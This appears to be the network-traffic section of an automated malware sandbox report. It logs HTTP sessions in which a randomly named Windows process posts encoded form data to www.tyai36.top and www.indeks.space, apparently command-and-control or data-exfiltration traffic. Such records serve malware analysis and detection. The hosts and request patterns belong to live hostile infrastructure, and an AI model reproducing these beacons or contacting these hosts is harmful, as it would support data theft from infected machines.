Aug 27, 2024 17:47:21.852082968 CEST	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 27 Aug 2024 15:47:21 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "66b12d1b-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.11.20	49818	38.47.207.120	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:47:24.369869947 CEST	2578	OUT	POST /7te8/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.tyai36.top Origin: http://www.tyai36.top Referer: http://www.tyai36.top/7te8/ Content-Length: 52933 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 75 42 6c 59 77 2f 44 78 48 63 6f 4d 42 4a 72 75 2b 4d 48 54 6e 53 76 2f 37 55 38 63 76 34 49 42 65 67 71 7a 61 44 37 6a 48 59 45 51 30 73 2b 51 68 72 6c 77 50 67 52 45 38 4f 2f 41 32 34 6d 70 68 7a 58 65 64 30 75 47 32 68 44 39 42 67 39 79 69 69 42 4b 41 48 31 51 75 41 53 67 4f 55 66 5a 63 6f 36 70 36 58 52 51 36 47 76 4c 4b 5a 67 45 35 6c 64 6f 45 45 59 39 66 75 31 42 4b 5a 48 42 46 7a 7a 2f 6e 44 68 54 62 39 6b 2b 68 65 38 43 4b 48 6b 68 58 62 45 63 68 6c 38 79 73 76 38 75 54 30 67 6d 6e 79 74 4c 76 44 59 35 6e 59 75 2f 73 50 4f 45 55 72 50 6a 4c 69 50 30 62 4d 59 42 37 44 4e 74 75 39 72 44 74 48 71 56 64 45 62 37 32 37 57 6a 53 71 7a 61 6f 69 52 64 77 77 56 42 6a 33 73 71 36 2f 44 74 44 4e 69 6c 38 41 41 4c 53 56 38 34 63 59 33 66 58 4f 68 43 42 61 47 38 36 74 79 48 42 46 57 70 4d 4a 43 44 36 67 39 71 52 76 51 7a 62 32 59 62 30 68 6b 42 47 4d 62 45 36 59 65 44 6a 78 55 6b 38 56 71 56 70 4c 7a 46 49 63 51 42 6a 59 47 4a 4b 4e 72 39 70 43 31 48 78 57 47 74 44 54 6e 65 41 [TRUNCATED] Data Ascii: AvLLLbOh=uBlYw/DxHcoMBJru+MHTnSv/7U8cv4IBegqzaD7jHYEQ0s+QhrlwPgRE8O/A24mphzXed0uG2hD9Bg9yiiBKAH1QuASgOUfZco6p6XRQ6GvLKZgE5ldoEEY9fu1BKZHBFzz/nDhTb9k+he8CKHkhXbEchl8ysv8uT0gmnytLvDY5nYu/sPOEUrPjLiP0bMYB7DNtu9rDtHqVdEb727WjSqzaoiRdwwVBj3sq6/DtDNil8AALSV84cY3fXOhCBaG86tyHBFWpMJCD6g9qRvQzb2Yb0hkBGMbE6YeDjxUk8VqVpLzFIcQBjYGJKNr9pC1HxWGtDTneA8fnV5NYq+YTC1Ar06Gn/Qrt5drhF9lE7YN9CsGEPtsVE072mfgpzK/oJJRWcVXgKHFFwnPtSSdyXhjzuwFyERl7dGZvltS4VLocjd509Fyb1u0XIE2QIW2q/U9zuC9mXuNh7NBccIAtyzpyOF29bC4ZH1+OoYq1kISuFMhfpQGlFMXE8OjcuHCRPDNwH+13RWLIHtl3m1vg/WhWkd3mZ464amb432jrRBoVkpWQaRo/S2JmNzCs2LwAJw23czx0r8kjgEHUQ8EkBB+ZTVc3HcaDMBdBgaItL0G7zpRiheVi8qquDPW22S64YaUz0iQd/Nx+h877hx+vV9k0R18rXVDIcwbwbMpvjX5ka7tsUSiF6f5LT2yeUexDoqNnrPNXdR9G4Bq4mHlGfPoFDb29p05R+RnyPorcNMNh+TrBnGA3ek2exHf169//1jmEjd4MOppwQ4q3CSPup24nVBmd8VBNyVpTQFUJzs/h7AVZAALet3wNbk+Jbq8vFoEFtSfYNtu9IO5q5uy1VhlUA6K+ckqce6rsTzwf88xfMtH0jHlDIlK42/Wuva3karx4Ur7YUttrvFXMAnrNApg1RGLKp9XzSczoQjGUEuEKs9e9ql294GuIYUYe5WeROI30WFVMpoY8ohXeGX20v0AV0pE54bt56RSh0pTaGYP [TRUNCATED]
Aug 27, 2024 17:47:24.369893074 CEST	2578	OUT	Data Raw: 72 45 34 68 2b 51 63 74 52 47 70 54 57 75 79 48 7a 46 36 64 62 7a 59 76 38 33 71 54 50 76 44 74 77 57 4c 69 54 47 54 4a 67 4c 69 38 67 37 76 42 4b 31 6c 2f 61 70 74 69 6c 51 30 4c 6a 69 54 69 4c 57 56 38 46 58 4a 4a 5a 5a 49 37 63 41 6d 5a 75 4b Data Ascii: rE4h+QctRGpTWuyHzF6dbzYv83qTPvDtwWLiTGTJgLi8g7vBK1l/aptilQ0LjiTiLWV8FXJJZZI7cAmZuKQwVEylqW3bH9WKxjnr2Tg0vHDHGzcYpO6Uxjbu07IZnATmnbcsDcZ6s6CfQjTKYoC6gQI2Cdm8jPC8a5m1P9xMYePPFnfFk5l+/Jwn/uRAj8OCV4zsj5rtGgwfp90AYBlTEtZMpPlUWSR0Bjiz8RPfv7FKnt7c8bX
Aug 27, 2024 17:47:24.369951963 CEST	7734	OUT	Data Raw: 30 6f 6d 76 52 2b 58 68 45 68 54 5a 6c 42 66 67 34 41 31 47 6b 66 69 53 45 61 63 68 33 4f 42 65 4b 32 37 74 67 6d 37 78 2b 46 6c 53 4d 49 30 43 35 35 6a 78 42 43 4c 76 66 64 6d 78 55 63 35 51 50 7a 45 6f 71 6b 48 30 42 66 48 47 2b 46 61 34 43 51 Data Ascii: 0omvR+XhEhTZlBfg4A1GkfiSEach3OBeK27tgm7x+FlSMI0C55jxBCLvfdmxUc5QPzEoqkH0BfHG+Fa4CQG4iPxyoi+Ww5qoe8Hqj5l4zeyoEzN2ZbRwf4QZRIYdWVCListdVu8n5UxdI+QOEVJn3xXuNYVhk6urtSCZQvVB9wkKzJE1//zXP/uQA8jo7MXNOpZNzp1kj/1THvlBCnRCfCKt6MdV9kMgkKnD/D+FBQzGdJgIjIP
Aug 27, 2024 17:47:24.671295881 CEST	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 27 Aug 2024 15:47:24 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "66b12d1b-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Aug 27, 2024 17:47:24.671410084 CEST	1289	OUT	Data Raw: 69 6e 5a 70 57 41 38 50 52 5a 70 77 7a 33 2b 31 4d 4f 5a 4a 6b 58 4c 74 4e 70 42 74 7a 31 62 4f 39 4f 34 2f 6d 74 4d 32 53 55 51 54 63 39 4d 54 61 5a 30 6c 63 77 33 4f 76 4c 4a 67 74 51 6a 71 39 4b 4f 70 41 6f 4d 6b 34 4d 48 43 6c 39 49 33 54 4d Data Ascii: inZpWA8PRZpwz3+1MOZJkXLtNpBtz1bO9O4/mtM2SUQTc9MTaZ0lcw3OvLJgtQjq9KOpAoMk4MHCl9I3TMMS8u7v5OuBQFgaviAWe+LhUHp17DHWRkfJLqJB8uE2LjFFD79adD/9RV4fIInH0s6eIrdzcBOCuLj5MJtKLtpDHShdIFTHNnib0uWgecpdGtWJY6r2AwtETq8+9CcamN1oUdOfk4pnxFKGXLxz183tj7+Sj8r42EQ
Aug 27, 2024 17:47:24.671458006 CEST	1289	OUT	Data Raw: 41 50 6a 57 48 30 64 72 4d 45 48 4a 79 38 70 39 64 50 42 4d 55 6f 6c 45 56 48 64 48 73 43 36 46 69 37 38 75 54 43 64 38 63 62 46 42 45 69 64 49 74 72 4a 6b 6c 4a 65 37 78 61 45 31 56 72 72 2b 4c 50 55 4f 2b 4e 4c 58 6b 4e 39 61 71 39 2f 55 44 54 Data Ascii: APjWH0drMEHJy8p9dPBMUolEVHdHsC6Fi78uTCd8cbFBEidItrJklJe7xaE1Vrr+LPUO+NLXkN9aq9/UDTYdPivc47n0zyLIIn42H9Mmhoc4SFS2Ng9W2LGlbIqB/T86lr7CSlHRIuS1fcfc+ZchOoi1bJJqhq4RCmyF58lMsNOY8HxRkbBfZhcdhLaA2JDootzoaefYvfH98gvxn3M44C+N9gK3h/fb4SzBoDrTdzLiHZtMJbh
Aug 27, 2024 17:47:24.671678066 CEST	5156	OUT	Data Raw: 73 6b 69 75 68 2f 69 54 75 50 75 31 39 6d 68 4b 38 68 56 57 6f 33 7a 67 4e 62 69 33 43 4d 34 64 46 58 34 68 78 67 35 50 2b 64 49 33 73 2f 54 56 65 66 5a 71 71 39 6e 65 59 43 5a 73 74 4a 4c 7a 4c 72 38 31 5a 7a 6b 6a 6d 37 62 61 7a 53 61 4a 57 49 Data Ascii: skiuh/iTuPu19mhK8hVWo3zgNbi3CM4dFX4hxg5P+dI3s/TVefZqq9neYCZstJLzLr81Zzkjm7bazSaJWIz6WGdrbSj4cgpVcYl7oZ+aoYsYi1LrQl5wjfhNlp2DxTbwipZ/ahNwO2aauvQicyxVb7Y+xH0qlHVKjqR/XAsD/yFFfAfKmwQd6zXs3A7P8c4QSwh+iLg+xOmPWO8ItVACJnl9Lf7qYOCHT0ScPLyCnRYMve2agKE
Aug 27, 2024 17:47:24.672020912 CEST	5156	OUT	Data Raw: 76 30 2f 47 37 63 42 37 62 74 2b 6f 63 52 6a 44 77 6d 53 46 65 4f 4f 57 7a 68 41 61 6b 52 50 72 75 44 6c 42 4d 66 78 50 4e 32 31 72 74 4e 70 59 6f 65 33 50 44 35 6c 53 2f 67 74 65 35 74 7a 74 33 6a 6f 58 31 50 55 75 42 6e 6e 33 76 42 59 4a 52 59 Data Ascii: v0/G7cB7bt+ocRjDwmSFeOOWzhAakRPruDlBMfxPN21rtNpYoe3PD5lS/gte5tzt3joX1PUuBnn3vBYJRYKmimK6eec2gd+4/sVIFXCmtyEQdMh8w1tnsnfHQKqFN3n7z65p0C7XOXSLtxi3BFsizdYWMNLTYYJMv7UQDhCy2IF8g3wxsxZIaChgmYsW9+8jvkSFpjtk7ZSD3qA5Q00DUbtWo0l3qodcjQWGUe6o7uo8xqC77hL
Aug 27, 2024 17:47:24.672305107 CEST	3867	OUT	Data Raw: 4b 52 59 42 2f 4f 63 30 33 31 4e 74 4a 30 37 32 49 59 55 64 4f 37 73 65 35 39 62 2b 6e 79 6a 47 70 79 49 31 57 30 4e 44 6d 37 7a 31 4f 37 67 6f 35 77 6a 64 79 42 50 67 46 6c 44 65 59 66 43 78 74 69 7a 39 35 63 61 6f 70 5a 55 4a 4b 45 71 6a 47 6f Data Ascii: KRYB/Oc031NtJ072IYUdO7se59b+nyjGpyI1W0NDm7z1O7go5wjdyBPgFlDeYfCxtiz95caopZUJKEqjGoHwRg2ItXIG9SHmAk+gNZl6XxwIby7v/LrpTOjvaa7LCQgbFVchBKz+JwhztMvQW5qS5qcWURMtVfkqzi1586PZ48jk/PU7r+SFjIp3tJpJZB0dqRrnqWicVue7E6h7+ClDGazQbdpFgIWbx+7AvGKVlEfbYj61RbU
Aug 27, 2024 17:47:24.672363043 CEST	3867	OUT	Data Raw: 6f 4b 58 31 77 42 59 72 78 67 45 6c 72 48 6c 55 39 79 35 53 4a 44 67 61 6e 74 42 4f 6c 6a 76 53 76 49 2f 6e 53 50 31 68 50 69 62 50 47 55 32 54 64 39 6a 49 30 52 42 32 6e 54 77 74 2f 39 4f 4f 59 6a 4e 62 61 55 46 66 4e 6d 5a 4f 45 45 6e 33 47 38 Data Ascii: oKX1wBYrxgElrHlU9y5SJDgantBOljvSvI/nSP1hPibPGU2Td9jI0RB2nTwt/9OOYjNbaUFfNmZOEEn3G8kN5DMdpdJhdqLWHAMJYTkDELAgagfMzKslg8Mc0YSFoe4I9ccUjEzFmXtu0C6Tto/InadF1oGRqubmKWVy67i4AvfYseKKLroW8jKExipZakyXmV3V6Hop8SLh2NqsOscO2URm0jRd8qhmJ3qFRGkqJ41NWVVdCnf
Aug 27, 2024 17:47:24.673413038 CEST	1289	OUT	Data Raw: 7a 75 4b 76 56 34 45 48 38 32 76 32 36 65 44 31 53 59 68 79 4b 6e 76 38 38 6c 35 7a 39 32 53 59 73 4d 53 6f 6e 6d 67 6b 2b 58 35 79 30 4c 47 34 54 2b 56 65 41 53 78 59 56 42 54 4c 78 39 6d 75 73 50 6e 47 32 73 47 73 51 35 78 71 31 34 45 78 6c 36 Data Ascii: zuKvV4EH82v26eD1SYhyKnv88l5z92SYsMSonmgk+X5y0LG4T+VeASxYVBTLx9musPnG2sGsQ5xq14Exl63L4+TjbH4JKYRGSbtE8emm+yz5MGz5H3d4q8zAtcAreYk23ZZyriWp2uLKF5kTfV300zb1A9P8qWSSSqkI4Hw7dL7E6ccYILNCSXAjlffN+9dTtemHTNvAWCEYpBT3tzwZVuFJSyzWj28bQ1L/NBIMpUj14DIwpiY
Aug 27, 2024 17:47:24.673461914 CEST	3867	OUT	Data Raw: 58 6f 31 63 2f 59 46 6e 32 66 47 44 58 69 68 4c 6f 4d 42 6a 31 61 69 46 55 69 73 74 56 4d 6e 30 46 4f 6a 46 76 52 71 51 73 39 4a 79 31 54 34 32 4f 54 43 45 4f 35 42 78 67 41 32 7a 77 4b 42 31 31 75 35 31 6a 32 79 52 2b 6a 70 6d 6a 35 74 65 6d 61 Data Ascii: Xo1c/YFn2fGDXihLoMBj1aiFUistVMn0FOjFvRqQs9Jy1T42OTCEO5BxgA2zwKB11u51j2yR+jpmj5temaJaiW21gvQaOFjKUD5kScoYADwhvgBkDwaDKreFRNBTJ/BfSlIJMCUWkH35tI5EbvrWv04v8YxtHhzcCxIih3cvXhuUV6m3LDlJWFdyu5/3coF5tyIc4LztFCgOaAQBV+wU+QyyNiM0Gz750flX5jbo0Tk+PRp4R4r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.11.20	49819	38.47.207.120	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:47:27.213629007 CEST	523	OUT	GET /7te8/?AvLLLbOh=jDN4zPqbFf9yM+3zgc/bkSOt3FtgrIUvIR/YWyCTW7MfoJq2/oprJylb09/bpIujsG26CmWa4QbZN3EYlCF2dF9UrXrnLyDZVZ+LwV0bzVblUs0ijF56Mzs=&7RB=66nPyLG8 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.tyai36.top Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Aug 27, 2024 17:47:27.521915913 CEST	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 27 Aug 2024 15:47:27 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "66b12d1b-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.11.20	49820	194.58.112.174	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:47:41.402327061 CEST	788	OUT	POST /1fqp/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.indeks.space Origin: http://www.indeks.space Referer: http://www.indeks.space/1fqp/ Content-Length: 205 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 33 6f 34 52 6c 39 50 4d 34 48 42 32 71 55 77 6e 48 39 59 49 52 30 54 66 56 38 2b 39 64 6e 39 55 62 4d 68 63 61 57 67 67 43 4a 36 44 37 34 69 75 77 76 59 61 33 51 66 68 77 66 4d 59 64 36 55 67 34 54 53 45 45 75 79 47 66 73 75 33 49 52 50 67 6f 77 79 62 48 4a 44 65 73 4c 47 47 59 46 74 71 6f 46 76 37 56 77 6b 59 43 55 49 62 4e 35 7a 49 39 5a 45 47 6a 53 42 52 64 4d 31 62 64 48 62 48 61 74 46 4a 43 45 4b 6f 68 6b 47 57 73 66 50 4b 4f 41 63 4f 7a 30 69 55 47 6d 63 50 66 75 59 48 37 39 2f 33 72 62 59 34 36 6f 57 38 31 2b 36 49 4b 79 4a 7a 7a 56 76 67 6c 79 7a 61 71 55 38 67 52 41 3d 3d Data Ascii: AvLLLbOh=3o4Rl9PM4HB2qUwnH9YIR0TfV8+9dn9UbMhcaWggCJ6D74iuwvYa3QfhwfMYd6Ug4TSEEuyGfsu3IRPgowybHJDesLGGYFtqoFv7VwkYCUIbN5zI9ZEGjSBRdM1bdHbHatFJCEKohkGWsfPKOAcOz0iUGmcPfuYH79/3rbY46oW81+6IKyJzzVvglyzaqU8gRA==
Aug 27, 2024 17:47:41.623388052 CEST	1289	IN	Data Raw: ae 56 4e 38 6a 6b 93 e7 92 b4 7d 30 dd 00 f1 d1 53 18 f7 cf 88 7a f7 93 2f e1 22 8f 93 cf e3 ef 44 4e aa 77 93 cf 75 78 a4 e2 ba 05 e2 4c f1 cc d1 6a 94 a7 b4 05 6a d8 50 32 1a 05 4a 27 7a 93 d5 65 ac d3 ca ea 0d 07 76 24 bd 2f 50 c3 fe 0e 19 c8 Data Ascii: VN8jk}0Sz/"DNwuxLjjP2J'zev$/PB[$Pzi(wA#`a1%wtZD7(.kLYyZdB&-@VPZcN2cn)<5=f
Aug 27, 2024 17:47:41.623506069 CEST	1289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 27 Aug 2024 15:47:41 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 65 32 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 74 bc 8e ea 87 66 38 94 b6 aa 5b ba bc ee 3a 5e 5f 04 ca 6d 94 c2 68 ec aa b0 a7 14 a6 18 a8 8e 23 1b 25 e9 ba 25 d1 0b d4 46 2e 28 0b 66 c8 51 e4 9b 76 18 62 f8 49 7f 07 4b c8 5a 6f 48 c8 e4 7b 26 fe ac 2e 97 04 e9 0e aa 1a c8 ae b2 ae 18 dc b0 59 0f ed c0 19 46 4d eb 58 fd e8 fa f9 0b e7 [TRUNCATED] Data Ascii: e2fZmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskktf8[:^_mh#%%F.(fQvbIKZoH{&.YFMX.[?fqyv^zcVJIy4JHPad%WAPvT,<6,F#mSQd4V~gma+\|\\|j-"RAqnj4T={\DL$x7 ;TJ}mj3h,8[J~xA!hv3y?YdnabJpAS[^#9603t~D31Js8(`6Ul?a>g)u-="3]cJH?fiEZ@lTy\wi{60Pv:0Q%Y#Nh=eK$o(U#@eg.k9KAl:d$:+A&Xt^#N\|%$7E\|?C`uXTTJX3R<Z5.$?NN&eoRH.j;W2l?EUM\| [TRUNCATED]
Aug 27, 2024 17:47:41.623519897 CEST	1239	IN	Data Raw: a7 9c 04 3d d9 b3 c8 af 38 ed 80 a7 14 0e 91 1e 40 16 1c 22 80 9e 39 3f cb 63 05 65 23 60 ec 4f 20 6c 3a 23 dd c7 ec 89 b5 d7 de 34 38 91 c9 b3 4b 74 c6 10 e9 3e 9c 8f 9e d2 63 a8 f4 38 15 2c c4 f7 60 4f bd cc 4b 0f 95 0a 57 92 87 bc d4 9b db b1 Data Ascii: =8@"9?ce#`O l:#48Kt>c8,`OKWpy62^="?*7(F>P8wV:_?2u2-ZNg82t.T0^S.hnEeYTg#)6Xtz(9~\|I\|}Jy\M:WlN?

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.11.20	49821	194.58.112.174	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:47:44.168339968 CEST	1128	OUT	POST /1fqp/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.indeks.space Origin: http://www.indeks.space Referer: http://www.indeks.space/1fqp/ Content-Length: 545 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 33 6f 34 52 6c 39 50 4d 34 48 42 32 73 33 34 6e 41 65 41 49 41 45 54 51 51 38 2b 39 47 33 38 38 62 4d 64 63 61 58 56 6c 58 73 53 44 37 64 47 75 78 74 77 61 32 51 66 68 6f 76 4d 64 5a 36 55 37 34 54 58 6b 45 71 79 47 66 73 36 33 4a 69 48 67 38 51 79 59 50 70 44 5a 72 4c 47 48 63 46 74 61 6f 46 72 42 56 79 59 59 43 46 55 62 4d 2f 66 49 75 63 34 48 6e 79 42 74 62 4d 31 55 50 48 62 7a 61 74 41 38 43 46 76 64 68 53 4f 57 74 2b 76 4b 50 41 63 4e 35 45 69 54 62 32 64 59 61 73 5a 30 67 50 54 2f 6b 37 73 30 79 37 65 6d 77 76 43 72 4f 54 56 38 74 32 33 71 6a 53 4f 46 6f 31 78 75 52 53 65 67 55 77 5a 33 67 6d 44 6a 4b 49 6e 70 78 77 70 2b 31 56 56 44 68 67 31 56 76 4f 48 37 49 4b 4c 4d 78 37 6f 6a 5a 61 39 37 36 47 44 75 76 38 51 47 72 77 62 2f 34 41 54 54 71 42 43 36 65 48 47 6f 37 49 39 65 43 45 43 41 51 30 50 67 47 78 55 72 6d 59 49 42 2b 54 63 4a 37 66 5a 57 56 44 41 66 36 55 6b 54 2b 67 6d 6b 74 4f 31 66 55 62 59 76 74 54 70 38 2f 43 4a 2b 64 71 57 4d 59 4c 43 4e 5a 6f 32 77 4d [TRUNCATED] Data Ascii: AvLLLbOh=3o4Rl9PM4HB2s34nAeAIAETQQ8+9G388bMdcaXVlXsSD7dGuxtwa2QfhovMdZ6U74TXkEqyGfs63JiHg8QyYPpDZrLGHcFtaoFrBVyYYCFUbM/fIuc4HnyBtbM1UPHbzatA8CFvdhSOWt+vKPAcN5EiTb2dYasZ0gPT/k7s0y7emwvCrOTV8t23qjSOFo1xuRSegUwZ3gmDjKInpxwp+1VVDhg1VvOH7IKLMx7ojZa976GDuv8QGrwb/4ATTqBC6eHGo7I9eCECAQ0PgGxUrmYIB+TcJ7fZWVDAf6UkT+gmktO1fUbYvtTp8/CJ+dqWMYLCNZo2wMc0qqfR+UKJKo36oXX/X0haHjjABidlbfoN0JpL8RHFoC0gu99YXJW8g61el0i8Uad6ad8SIpABisbTUkmIDbWixdPPqlhcaI43HD1huE0SnWmwMHZFvjesFTF2cLgNl9p0m+hCmuCB/0tRa9fn9WwXkpycoL1Hq6OsUeG1alKpfCHzRxCeARe3Yl57WQJSnYpBN02DLQH4akEc=
Aug 27, 2024 17:47:44.401834965 CEST	1289	IN	Data Raw: ae 56 4e 38 6a 6b 93 e7 92 b4 7d 30 dd 00 f1 d1 53 18 f7 cf 88 7a f7 93 2f e1 22 8f 93 cf e3 ef 44 4e aa 77 93 cf 75 78 a4 e2 ba 05 e2 4c f1 cc d1 6a 94 a7 b4 05 6a d8 50 32 1a 05 4a 27 7a 93 d5 65 ac d3 ca ea 0d 07 76 24 bd 2f 50 c3 fe 0e 19 c8 Data Ascii: VN8jk}0Sz/"DNwuxLjjP2J'zev$/PB[$Pzi(wA#`a1%wtZD7(.kLYyZdB&-@VPZcN2cn)<5=f
Aug 27, 2024 17:47:44.401949883 CEST	1289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 27 Aug 2024 15:47:44 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 65 32 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 74 bc 8e ea 87 66 38 94 b6 aa 5b ba bc ee 3a 5e 5f 04 ca 6d 94 c2 